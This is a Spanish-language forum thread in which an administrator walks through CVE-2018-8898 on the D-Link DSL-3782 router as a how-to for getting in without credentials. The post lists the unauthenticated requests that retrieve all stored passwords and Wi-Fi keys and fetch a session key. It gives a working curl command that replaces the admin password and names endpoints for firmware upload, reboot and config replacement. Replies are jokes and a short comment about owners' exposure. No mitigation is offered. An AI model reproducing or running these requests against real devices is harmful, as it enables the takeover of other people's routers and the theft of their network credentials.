El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 21-05-2018 13:00:52

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

Cómo entrar en la interfaz de configuración de un D-Link DSL-3872 sin credenciales

DSL3782_1.jpg

fuente

  El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo   

Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador

GET  http://192.168.1.1/romfile.cfg 

 
Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:

  1. Red b/g/n;

    GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp
  2. Red ac:

    GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp 
  3. Red invitados

    GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp

  Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:

GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp

  Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:

  • Cambiar los credenciales de administrador de acceso a la interfaz web

    curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
    --data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
    http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
  • Cambiar las contraseñas wifi

    POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp
  • Actualizar firmware

    POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp 
  • Forzar reboot

    POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp
  • Subir una nueva configuración

    POST /cgi-bin/New_GUI/Set/config_upgrade.asp

  El problema, otra vez, es que D-Link no ha hecho nada  tras haber sido advertido. pam
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
     ¡Gracias D-Link! roll

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 21-05-2018 13:13:08

crash
Usuario

Registrado: 25-10-2017
Mensajes: 925

Re: Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas biere

Desconectado

#3 21-05-2018 13:18:42

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,252

Re: Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA.  big_smile

Desconectado

#4 21-05-2018 13:20:56

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 598

Re: Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

sheriff escribió:

Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
     ¡Gracias D-Link!

Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Pie de página

Información del usuario

Ultimo usuario registrado: juanita
Usuarios registrados conectados: 0
Invitados conectados: 6

Estadisticas de los foros

Número total de usuarios registrados: 1,114
Número total de temas: 1,121
Número total de mensajes: 11,583

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21